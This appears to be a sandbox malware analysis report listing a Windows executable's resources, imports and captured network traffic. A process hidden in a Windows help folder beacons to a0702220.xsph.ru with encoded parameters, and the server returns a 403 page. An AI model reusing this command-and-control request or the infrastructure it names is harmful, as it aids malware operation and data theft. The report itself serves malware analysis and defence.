RT_DIALOG	0x7f4e8	0xec	data	English	United States
RT_DIALOG	0x7f5d4	0x12e	data	English	United States
RT_DIALOG	0x7f704	0x338	data	English	United States
RT_DIALOG	0x7fa3c	0x252	data	English	United States
RT_STRING	0x7fc90	0x1e2	data	English	United States
RT_STRING	0x7fe74	0x1cc	data	English	United States
RT_STRING	0x80040	0x1b8	data	English	United States
RT_STRING	0x801f8	0x146	Hitachi SH big-endian COFF object file, not stripped, 17152 sections, symbol offset=0x73006500	English	United States
RT_STRING	0x80340	0x446	data	English	United States
RT_STRING	0x80788	0x166	data	English	United States
RT_STRING	0x808f0	0x152	data	English	United States
RT_STRING	0x80a44	0x10a	data	English	United States
RT_STRING	0x80b50	0xbc	data	English	United States
RT_STRING	0x80c0c	0xd6	data	English	United States
RT_GROUP_ICON	0x80ce4	0x5a	data
RT_MANIFEST	0x80d40	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL

Import

KERNEL32.dll

GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer

gdiplus.dll

GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 6, 2022 00:53:01.311467886 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.377403021 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.377499104 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.378452063 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.443624020 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.444070101 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.444111109 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.444153070 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.444191933 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.444194078 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.444231987 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.444264889 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.444271088 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.444309950 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.444335938 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.444348097 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.444386959 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.444406033 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.444423914 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.444483042 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.507935047 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.508009911 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.508061886 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.508080959 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.508111954 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.508164883 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.508172989 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.508227110 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.508280039 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.508284092 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.508335114 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.508387089 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.508388996 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.508440971 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.508490086 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.508549929 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.508568048 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.508621931 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.508625984 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.508691072 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.508728027 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.508766890 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.508797884 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.508827925 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.508856058 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.508893967 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.509000063 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.572487116 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.572546959 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.572592974 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.572626114 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.572633028 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.572673082 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.572688103 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.572711945 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.572750092 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.572757959 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.572788954 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.572825909 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.572829962 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.572864056 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.572901011 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.572912931 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.572941065 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.572981119 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.572988987 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.584369898 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.648134947 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.648192883 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.648232937 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.648250103 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.648484945 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.648544073 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.648547888 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.648597002 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.648710966 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.648714066 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.648766994 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.648821115 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.648825884 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.648874998 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.648933887 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.648935080 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649000883 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649059057 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649090052 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.649099112 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649137020 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649153948 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.649195910 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649241924 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649257898 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.649283886 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649319887 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649344921 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.649362087 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649401903 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649427891 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.649441004 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649482012 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649493933 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.649521112 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649560928 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649571896 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.649600029 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649636984 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649655104 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.649674892 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649720907 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.649725914 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649772882 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649812937 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649844885 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.649851084 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649890900 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649930000 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.649940968 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.649985075 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.649990082 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.650028944 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.650068045 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.650084972 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.650105000 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.650142908 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.650156975 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.650183916 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.650222063 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.650238037 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.650259972 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.650304079 CEST	80	49779	141.8.195.65	192.168.2.3
Aug 6, 2022 00:53:01.650322914 CEST	49779	80	192.168.2.3	141.8.195.65
Aug 6, 2022 00:53:01.690360069 CEST	49779	80	192.168.2.3	141.8.195.65

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 6, 2022 00:53:01.227482080 CEST	58981	53	192.168.2.3	8.8.8.8
Aug 6, 2022 00:53:01.245068073 CEST	53	58981	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 6, 2022 00:53:01.227482080 CEST	192.168.2.3	8.8.8.8	0x8e7	Standard query (0)	a0702220.xsph.ru	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 6, 2022 00:53:01.245068073 CEST	8.8.8.8	192.168.2.3	0x8e7	No error (0)	a0702220.xsph.ru		141.8.195.65	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

a0702220.xsph.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49779	141.8.195.65	80	C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe

Timestamp	kBytes transferred	Direction	Data
Aug 6, 2022 00:53:01.378452063 CEST	1636	OUT	GET /tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf41c5b405309b9e=b64e0d0fcd8b0e37eaa44643c1b6ab3c&94c8169d9b8cbbe19972e7f6bf4e65c1=AM5MjZxQmMhRjMzE2M5kTN2EWOwczYxYGN3UDM5YjZwM2YmRmN2EDO&rRmbiWWxEOd55k=WTgIsnKuV HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: a0702220.xsph.ru Connection: Keep-Alive
Aug 6, 2022 00:53:01.444070101 CEST	1676	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 05 Aug 2022 22:53:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 68 65 69 67 68 74 Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-between;-moz-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height
Aug 6, 2022 00:53:01.444111109 CEST	1678	IN	Data Raw: 3a 34 35 30 70 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 20 2e 65 72 72 6f 72 2d 62 6c 6f 63 6b 7b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 69 6e 6c 69 6e 65 2d 62 6f 78 3b 64 69 73 70 6c 61 Data Ascii: :450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-webkit-fle
Aug 6, 2022 00:53:01.444153070 CEST	1679	IN	Data Raw: 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d Data Ascii: webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex}.wrapper .content .right-side .image-container{width:100%;height:100%;max-width:328px;max-height:384px;-webkit-box-pack:center;-webkit-justify-content:center;-mo
Aug 6, 2022 00:53:01.444194078 CEST	1680	IN	Data Raw: 68 74 73 20 2e 79 65 61 72 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 31 30 35 70 78 29 7b 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 70 Data Ascii: hts .year{font-weight:700}@media screen and (max-width:1105px){.wrapper .content{padding-left:77px}.wrapper .content .right-side{top:unset;bottom:52px;position:absolute;right:61px}}@media screen and (max-width:1105px) and (max-height:720px){.w
Aug 6, 2022 00:53:01.444231987 CEST	1682	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 c2 a0 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 74 69 74 6c Data Ascii: <h1 class="error-block__title"> </h1> <p class="error-block__desc">, </p>
Aug 6, 2022 00:53:01.444271088 CEST	1683	IN	Data Raw: 2e 32 38 20 39 33 2e 38 38 38 31 20 31 37 30 2e 36 36 33 20 39 33 2e 33 31 35 32 43 31 37 31 2e 36 31 39 20 39 31 2e 39 37 38 36 20 31 37 32 2e 37 36 37 20 39 30 2e 36 34 31 39 20 31 37 33 2e 31 34 39 20 38 38 2e 39 32 33 34 43 31 37 33 2e 33 34 Data Ascii: .28 93.8881 170.663 93.3152C171.619 91.9786 172.767 90.6419 173.149 88.9234C173.34 87.7777 172.575 87.2048 172.193 87.0139C171.428 86.441 170.471 86.632 169.706 87.0139C168.75 87.5867 168.559 88.7324 167.794 89.4962C167.411 90.0691 166.646 89.
Aug 6, 2022 00:53:01.444309950 CEST	1684	IN	Data Raw: 32 33 32 20 38 37 2e 35 38 35 39 20 31 38 39 2e 35 39 38 20 38 37 2e 35 38 35 39 20 31 38 36 2e 31 35 35 20 38 37 2e 35 38 35 39 43 31 38 35 2e 30 30 38 20 38 37 2e 35 38 35 39 20 31 38 35 2e 30 30 38 20 38 39 2e 34 39 35 34 20 31 38 36 2e 31 35 Data Ascii: 232 87.5859 189.598 87.5859 186.155 87.5859C185.008 87.5859 185.008 89.4954 186.155 89.4954C189.789 89.3045 193.423 89.4954 196.866 89.8773C197.44 89.8773 197.822 89.4954 197.822 88.9226C197.822 88.3497 197.44 87.9678 196.866 87.9678Z" fill="b
Aug 6, 2022 00:53:01.444348097 CEST	1686	IN	Data Raw: 32 2e 36 38 37 20 37 37 2e 34 36 37 20 32 32 33 2e 30 36 39 20 36 39 2e 30 36 35 32 43 32 32 33 2e 30 36 39 20 36 38 2e 38 37 34 32 20 32 32 33 2e 30 36 39 20 36 38 2e 38 37 34 32 20 32 32 33 2e 30 36 39 20 36 38 2e 38 37 34 32 43 32 32 37 2e 30 Data Ascii: 2.687 77.467 223.069 69.0652C223.069 68.8742 223.069 68.8742 223.069 68.8742C227.086 54.553 235.502 41.5683 237.797 26.6742C238.562 26.2923 238.753 25.1466 237.797 24.9557C226.703 22.6643 215.419 25.5285 205.282 29.9204C199.926 32.2118 194.762
Aug 6, 2022 00:53:01.444386959 CEST	1687	IN	Data Raw: 34 31 2e 38 31 37 20 38 33 2e 32 35 34 35 20 31 34 32 2e 39 36 33 43 38 33 2e 32 35 34 35 20 31 34 32 2e 39 36 33 20 38 33 2e 32 35 34 35 20 31 34 32 2e 39 36 33 20 38 33 2e 32 35 34 35 20 31 34 33 2e 31 35 34 43 38 33 2e 32 35 34 35 20 31 34 33 Data Ascii: 41.817 83.2545 142.963C83.2545 142.963 83.2545 142.963 83.2545 143.154C83.2545 143.345 83.4458 143.536 83.4458 143.727C79.0467 147.928 73.6912 152.51 68.9096 155.757C64.893 150.028 60.4939 144.681 55.7123 139.526C53.2259 136.853 48.0617 130.93
